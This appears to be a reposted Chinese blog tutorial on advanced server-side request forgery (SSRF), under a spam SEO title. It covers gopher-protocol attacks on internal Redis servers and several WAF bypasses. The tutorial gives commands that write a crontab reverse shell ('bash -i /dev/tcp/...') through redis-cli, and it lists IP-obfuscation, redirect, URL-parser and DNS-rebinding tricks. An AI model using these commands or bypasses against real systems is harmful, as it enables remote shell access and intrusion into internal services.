您的位置:首页 > 游戏 > 手游 > 品牌建设 企业发言_少女前线9a高性能芯片_互联网推广的方式_东莞seo整站优化火速

品牌建设 企业发言_少女前线9a高性能芯片_互联网推广的方式_东莞seo整站优化火速

2024/12/24 0:38:17 来源:https://blog.csdn.net/2402_87039650/article/details/143649784  浏览:    关键词:品牌建设 企业发言_少女前线9a高性能芯片_互联网推广的方式_东莞seo整站优化火速
品牌建设 企业发言_少女前线9a高性能芯片_互联网推广的方式_东莞seo整站优化火速

                SSRF的进阶


 

           1.Gopher协议的利用

 

1.gopher协议可以通过url指向指定IP端口发送任意内容,模拟大多数TCP协议,是SSRF中的一把利刃。

gopher协议URL: gopher://<host>:<port>/_<url编码的TCP数据>

这个url编码的TCP数据是gopher如此强大的原因,我们可以将任意TCP协议的流量,url编码后通过gopher这个载体发出去。这里有一个限制就是,gopher协议会一次把流量全部发送出去,这里就要它所承载的数据是无状态的单次链接,比如像有认证的mysql服务,就无法使用gopher来模拟。

 

2.不过gopher也不是在任何情况下都能使用,常见的编程语言对gopher协议的支持如下

 

PHP:--with-curlwrappers且php版本至少为5.3 

 

Java:小于JDK1.7

 

Curl:低版本不支持 

 

Perl:支持 

 

ASP.NET:小于版本3

 

3.使用gopher访问Redis 近些年来出现了大量无认证Redis的手法,但是Redis一般部署在内网,大多数情况下绑定在127.0.0.1:6379,无法从外部直接访问。但是在存在SSRF漏洞的情况下,可以通过gopher协议来访问内网的Redis服务,导致任意的增删改查,甚至造成写入webshell、crontab、SSH公钥等更危险的结果。

Redis协议(RESP)的格式还是较为简单的,对于gopher非常好构造。

 

4.在访问Redis时,可以采用写入Crontab(一种管理工具)的方式反弹shell。流程如下:

redis-cli flushall

echo -e"\n\n*/1****bash -i /dev/tcp/127.0.0.1/8080 0>&1\n\n" | redis-cli -x set 1

redis-cli config set dir /var/spool/cron

redis-cli config set dbfilename root

redis-cli save

我们可以使用socat转发并记录流量,获取Redis协议流。

socat -v tcp-listen:1234,fork tcp-connect=localhost:6379

 

然后将其中的数据转换成gopher协议,把所有我们发出的流量进行url编码。

 

                  2.SSRF的绕过

 

SSRF也存在一些WAF(Web应用防火墙)绕过的场景

1.IP地址变形

如果WAF限制了IP地址,比如只允许外网IP作为参数输入,这时可以采取以下绕过方式:

 

a.改变ip地址的进制 比如可以把127.0.0.1改为十六进制的0x7f000001,或者十进制的2130706433 

 

b.省略0位 可以将127.0.0.1省略为127.1                                                                                               

 

c.特殊写法的ip地址 在windows中0代表0.0.0.0。而在linux中0代表127.0.0.1

 

d.利用Enclosed Alphanumeric代替数字字母 ①②③.④⑤.⑥⑦.⑧⑨

 

2.利用跳转

 

可以使用302跳转到特定IP地址或者使用其他协议,需要服务端进行配置。

 

3.利用URL解析问题,

 

URL的格式较为复杂,不同的实现方式可能造成解析差异,比如

http://a@127.0.0.1:80@baidu.com, 对于php来说,hostname为baidu.com而对于libcurl(<7.54.0)来说hostname为127.0.0.1.

https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf

 

4.利用DNS

 

可以利用动态解析服务,比如nip.io。它可以将127.0.0.1 nip.io解析为127.0.0.1 

 

DNS重绑定,在某些情况下,后端服务可能采取这样的方法检测SSRF。先对域名进行解析,获得ip地址,判断ip地址合法性,如果合法则将域名传入到请求函数,在请求函数中会对域名做第二次解析。这样一来,如果我们搭建一个DNS服务,在第一次请求解析时返回一个合法的IP,在第二次解析时返回一个内网IP,就能绕过上述检测方式。

 

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com